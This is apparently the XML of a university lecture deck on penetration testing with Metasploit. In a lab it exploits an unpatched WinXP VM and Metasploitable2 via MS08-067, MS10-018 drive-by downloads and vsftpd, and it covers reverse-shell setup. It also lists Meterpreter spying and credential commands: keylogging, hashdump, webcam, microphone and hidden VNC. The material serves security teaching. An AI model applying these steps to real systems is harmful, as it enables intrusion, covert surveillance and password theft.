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321" r:id="rId12"/>
    <p:sldId id="292" r:id="rId13"/>
    <p:sldId id="315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16" r:id="rId23"/>
    <p:sldId id="317" r:id="rId24"/>
    <p:sldId id="301" r:id="rId25"/>
    <p:sldId id="302" r:id="rId26"/>
    <p:sldId id="303" r:id="rId27"/>
    <p:sldId id="304" r:id="rId28"/>
    <p:sldId id="305" r:id="rId29"/>
    <p:sldId id="306" r:id="rId30"/>
    <p:sldId id="319" r:id="rId31"/>
    <p:sldId id="307" r:id="rId32"/>
    <p:sldId id="320" r:id="rId33"/>
    <p:sldId id="308" r:id="rId34"/>
    <p:sldId id="318" r:id="rId35"/>
    <p:sldId id="309" r:id="rId36"/>
    <p:sldId id="310" r:id="rId37"/>
    <p:sldId id="311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261" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="127" d="100"/>
          <a:sy n="127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44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21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9629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5655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611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941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843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96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68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579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17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517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499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315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243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869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0085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9659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189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8530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357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5793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9316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0888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6731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193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84364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367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680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565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743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706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011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2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250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81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windows.com/en-us/microsoft-edge/tools/v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f.edu/~czou/temp/WinXP-RemovedAllPatches.ov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pid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasplo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ensive-security.com/metasploit-unleashed/about-meterpret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bcache.googleusercontent.com/search?q=cache:m85DZwRGF9EJ:opensourceforu.com/2011/02/metasploit-meterpreter-payloa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iteshshah.github.io/linux/kali/how-to-fix-metasploit-database-not-connected-or-cache-not-buil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security/ms09-001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JH6BHVbZiPs&amp;list=PLyYk0ysrovkXv_ltYm1QQrd1dOLw0VItj&amp;index=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security/ms10-018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L43nXM0vS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ppQMwoM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905000"/>
            <a:ext cx="8153400" cy="3001962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="92075" tIns="46038" rIns="92075" bIns="46038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lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" smtClean="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Cyber Operation and Penetration Testing</a:t>
            </a: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2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Compromising Target by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="Gulim" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t> tool</a:t>
            </a:r>
            <a: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  <a:t/>
            </a:r>
            <a:b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Cliff Zou</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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University of Central Florida</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600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1: Download the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> VM from Microsoft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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://dev.windows.com/en-us/microsoft-edge/tools/vms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/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Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> VM is not available on this site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Luckily, I have a version downloaded two years ago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2: Imported into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> and run 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3: Disable “automatic update” feature and disable “Windows Firewall”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4:  Remove ALL windows security patches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“control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>panel”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>”add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/remove programs”  click “show update”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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Remove each security patch one-by-one!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More than 30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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security patches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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, so be patient!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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203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8865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For your convenience, I have produced a vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> VM for you to download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I use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> “File” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> “Export appliance” to generate a single .ova </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>file of the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WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> after removing all security patches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Download from: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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cs.ucf.edu/~czou/temp/WinXP-RemovedAllPatches.ova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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>About 1.2GB size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1325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Up Vulnerable WinXP Virtual Machine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 smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Notes: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>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>not use this Windows IE browser to browse Internet, otherwise your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> could be quickly compromised by “drive-by download” attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The original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WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> VM will expire after 30 days, so this vulnerable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WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> VM image will also expire after 30 days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2891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What Critical Vulnerabilities does This WinXP Have?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Simple approach:  Use nmap or Nessus!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6 critical vulnerabilities found by Nessus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The included IE6 may have additional vulnerabilities (will discuss later)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6113"/>
            <a:ext cx="74374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10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1: Find attack module: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2: load the attack module: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3: load desired attack payload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410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585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08" y="5715000"/>
            <a:ext cx="805897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4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Good tutorial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit</a:t>
            </a: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Two popular shell payloads for most Windows exploits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Bind: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A bind shell is the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="16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Reverse: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it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="16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windows/upexec/reverse_tcp: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Generate a Windows style command line shell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Like running the “cmd” under Windows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windows/meterpreter/bind_tcp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windows/meterpreter/reverse_tcp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3969787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When to use a reverse shell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The target machine is behind a different private network.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The target machine's firewall blocks incoming connection attempts to your bindshell.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Your payload is unable to bind to the port it wants due to whatever reason.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You simply can't decide what to choose.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When a reverse shell isn't needed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if you can backdoor an existing service (already running on target), you may not need a reverse shell. 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3889828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Popular shell payloads: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windows/upexec/reverse_tcp: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Generate a Windows style command line shell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/>
              <a:t>Like running the “cmd” under Windows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windows/meterpreter/bind_tcp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windows/meterpreter/reverse_tcp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Meterpreter: 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More advanced shell, stealthy, powerful, and extensible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Tutorial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/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Functions: reboot, shutdown, take screenshot, enable webcam, etc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1722938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Payloads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How to set up for a reverse shell during payload generation?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b="1"/>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t> - This is the IP address you want your target machine to connect to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If your machine is behind a NAT (such as Wifi router), set LHOST to be your NAT’s global IP, and configure NAT to do port forwarding to your attack machine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b="1"/>
              <a:t>LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t> - This the port you want your target machine to connect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/>
              <a:t>If you want the reverse shell connect to another machine (listener), set LHOST and LPORT to the listener, and make sure the listener has started first before executing the reverse shell.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288496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Content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4: Find out what missing parameters in options that need to fill in  (show options)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5: Fill in missing options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962150"/>
            <a:ext cx="727233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6276975"/>
            <a:ext cx="490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8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Step 5: Execute exploit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Under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, type “help” to see all commands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good tutorial on using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter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3"/>
              </a:rPr>
              <a:t>http://opensourceforu.com/2011/02/metasploit-meterpreter-payload/ </a:t>
            </a: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534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9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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Powerful Meterpreter </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US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Meterpreter supports both Windows and Linux commands (such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and ls)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Example interesting commands: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File download/upload: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 smtClean="0"/>
              <a:t>Meterpreter&gt;download            upload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Kill:   kill a process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 smtClean="0"/>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Start capturing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>keystrokes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err="1" smtClean="0"/>
              <a:t>keyscan_stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  Stop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>capturing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>keystrokes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keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Dump the keystroke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>buffer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Screenshot:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Grab a screenshot of the interactive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>desktop (image is saved in local computer)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record_mic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Record audio from the default microphone for X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>seconds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webcam_snap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Take a snapshot from the specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>webcam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 smtClean="0"/>
              <a:t>Hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Dumps the contents of the SAM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>database (password database)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69654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lBattar" charset="0"/>
              </a:rPr>
              <a:t>Fix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0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US" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="AlBattar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AlBattar" charset="0"/>
              </a:rPr>
              <a:t>“Database not connected or cache not built”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US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Issue: The search command in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is too slow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A good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>solution tutorial:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://miteshshah.github.io/linux/kali/how-to-fix-metasploit-database-not-connected-or-cache-not-built</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>1: Start up PostgreSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>database services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#service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> start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Step 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Initialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> PostgreSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Database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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>msfdb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init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/>
              <a:t>Step 3: Rebuild database cache in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit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smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>msfconsole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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>db_rebuild_cache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1963"/>
            <a:ext cx="7181360" cy="7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70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Remote Desktop Payload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vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reverse_tcp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windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bind_tcp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Inject a VNC server remotely, and can have the display thrown back to the attacker’s host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Users of the target system user will not notice that their display is being shared  when in View Only mode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 err="1"/>
              <a:t>VNCviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> must be installed on the host system to see the VNC session thrown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>back by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>the target system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 dirty="0"/>
              <a:t>Kali Linux has already installed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>VNCviewer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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2348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Remote Desktop Payload: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400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7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14338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MS08-067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06375" y="914400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Remote Desktop Payload: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You will be able to spy on remote target’s user activities!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But, you cannot operate on remote computer, because one setting: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600"/>
              <a:t>ViewOnly              true            no        Runs the viewer in view mode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/>
              <a:t>Change this option as:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set ViewOnly false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>, then you can operate as a remote desktop on target machine!</a:t>
            </a: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36888"/>
            <a:ext cx="7978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19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Metasploit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 Attack: MS09-001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Let us move on to the next MS number: MS09-001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SMB Could Allow Remote Code Execution (958687):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3"/>
              </a:rPr>
              <a:t>https://technet.microsoft.com/en-us/library/security/ms09-001.aspx</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> tutorial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=JH6BHVbZiPs&amp;list=PLyYk0ysrovkXv_ltYm1QQrd1dOLw0VItj&amp;index=3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="12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465513"/>
            <a:ext cx="47926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260350" y="3798888"/>
            <a:ext cx="3230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Metasploit only has an attack module to crash the remote Windows, but it is not successful in my trial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8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Let us move on to the next vulnerable MS number: MS10-018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This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer version 6 and 7.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Advisory: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://technet.microsoft.com/en-us/library/security/ms10-018.aspx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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> tutorial on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attack this bug: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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=BL43nXM0vSI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This is an example of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Drive-by Download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>” attack to vulnerable Internet browser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7166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Attack scenario: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Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> with vulnerable IE6:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>10.0.2.6</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="18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/>
              <a:t>Attack Kali Linux:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>10.0.2.15</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="18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273105"/>
            <a:ext cx="78390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Vulnerable Linux: metasploitable2 Linux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It will be the target for our exploiting test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First, start running this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>metasploitable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linux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Then, run Nessus on Kali or your host to scan this vulnerable Linux to find critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>: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The Metasploitable2 has 10 “critical” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>. We first use the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>” vulnerability to demonstrate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694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5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143001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Set payload and fill in missing parameters in ‘options’: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33600"/>
            <a:ext cx="76009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6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Since we use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>” payload, we need to set LHOST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Set Local server’s IP address and service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>port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SRVHOST,  SRVPORT</a:t>
            </a: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So that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>a local malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Web server will run after the exploit has been executed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0"/>
            <a:ext cx="559904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‘Exploit’ command will generate the malicious webserver, and tell you which URL should be sent to victim to use (such as included in a spam email)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In above example, attacker needs to lure a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>to browse URL: http://10.0.2.15:8080/RgeUtk5dw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523124"/>
            <a:ext cx="8201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When a vulnerable IE6 connects to this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>webserver on the specified URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>the IE6 will shut down without any error message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And on the attacker side,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generated a new Meterpreter session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8915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36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MS10-018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/>
              <a:t>You can start to use this generated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> session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05000"/>
            <a:ext cx="8724900" cy="33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520104"/>
            <a:ext cx="4962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7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This vulnerability is also IE’s bug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Another example of IE6 vulnerable to ‘Drive-By Download’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“excellent” means even better exploit than previous MS10-018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3366311"/>
            <a:ext cx="8791575" cy="34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1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This vulnerability is also IE’s bug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676400"/>
            <a:ext cx="6429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MS10-046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3048000"/>
            <a:ext cx="8229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/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
